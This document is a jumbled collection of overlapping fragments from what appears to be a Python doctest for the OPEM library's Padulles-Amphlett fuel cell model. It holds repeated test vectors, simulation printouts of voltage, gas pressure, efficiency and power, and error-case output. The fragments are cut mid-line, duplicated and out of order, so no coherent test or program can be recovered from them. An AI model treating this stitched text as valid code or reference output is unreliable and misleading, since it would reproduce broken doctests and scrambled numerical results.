V FC Efficiency : -1.2042213141380103e+271 FC", "0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage", "-*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>>", "Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta", "PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal", "V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage :", "PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ###########", "Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2", "Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency :", "atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W", "Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency :", "V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm", "Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency :", "V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency", "Power : 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V", "0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I :", "V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency", "Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta", ">>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing", "0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212", "3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration :", "0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage", "generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>>", "0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power", "Power-Thermal : 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta", "Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162", "0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606", ": 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration", "Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"]", "Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678", ": 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2", "Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>>", "Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V", ": 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration", ": 0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC", ">>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>>", "Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V", ": 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC", ": 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I", "V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage :", "0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369", "atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8", ": 8.033558485745605 W ########### I : 3.7 E : 6.068360106342617 V Eta Activation", "Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784", "Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V", "Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V", "V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power :", ": 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC", "Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency :", "E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871", "Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333", "6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta", "########### I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V", "0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I :", "E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721", "W ########### I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559", "0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss :", "atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5", "0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913", "Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V", ": 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V", "Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W", "Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I", ": 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta Activation", ": 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O :", "atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V", ": -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2", "Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={},", "V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage :", "1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration :", ": 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2", ": -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2", "W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497", ": 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2", "1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta Activation :", "V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm", "Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency :", "6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta", ">>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)", "PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ###########", "PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal", "PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E", "Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V", "FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676", "0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage", ": 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration", "atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W", "3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation :", "0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605", "0.0003746674093630815 V Eta Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power", "W ########### I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032", ": 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 :", "atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W", "FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706", "PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E", "V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic", "Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2", "########### I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V", "atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W", ": 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 :", ". . . I : 0.1 E : 6.14455344314445 V Eta Activation :", "PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal", "Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V", ": 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 :", "FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm", ": 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751 V Eta Concentration", "W ########### I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771", "-1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss :", "Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5]", ": 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration", "Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2", "PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal", ": 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V", "atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W", "0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256", ": 0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC", "atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2", "FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739", "0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 :", ": 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta Activation", ": 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC", "Warning : The value of I(>0.1) leads to minus amount of V, please", "PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E", "atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V", "FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm", "0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage", "0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337", "4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta Activation :", "Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O", "Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2", ": 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC", ": 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report", "W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776", "FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm", "Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497", ": 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta Activation", "0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power", ": 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E :", "V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic", "0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss :", "V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency", "-*- coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil", "3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791", ": 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration", "2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 :", "FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm", "Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2", "0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC", "9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power", "V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency", "9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 :", "Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2", ": 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration", "0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss :", "0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I :", "W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658", ": 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC", "Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta", "2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration :", ": 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 :", "4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834", ": 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E :", "0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC", "########### I : 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V", "0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage", ": 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V", "V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic", ": 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta Ohmic : 1.8785852500552963e+271 V", "V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage :", "0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017", "PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E", "W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413", "E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626", "V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power :", ": 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC", "Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O", "atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W", "Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V", "0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435", "W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605", "0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration :", "Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2", ": 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I", "0.0005757433248249061 V Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power", "Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V", ": 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I", "1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 :", "W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846", "0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845", "Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2", "0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154", ": 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E :", "V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency", ": 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2", "9.383659842634243 W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 :", "3.9730043399134525 V Loss : 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362", "V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power :", ": 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC", "atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W", "Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O", ": 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC", "V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm", "PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal", "V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power :", ": 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 :", "PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal", "Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239", "V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm", "1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta Activation :", "0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164", "Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5]", ">>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"}", "0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss :", ": 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I", "Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622", "Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2", ": 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss", "Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O", ": 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC", ": 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V", "FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347", "4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage", "Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency :", "Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta", ": 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss", "Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996", ": 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss", ": 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal :", "4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542", "0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage", "0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894", ">>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>>", "Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O", "0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC", "0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power", "Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O", "V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm", ": 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration", ": 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O :", "atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9", "Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753", "Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta", "Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V", "PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report is generating ...", "0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W ########### I :", ": 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V", "0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627", "Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic :", ": 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss", "Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta", "6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta", ": 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 : 0.1967632812659846 atm 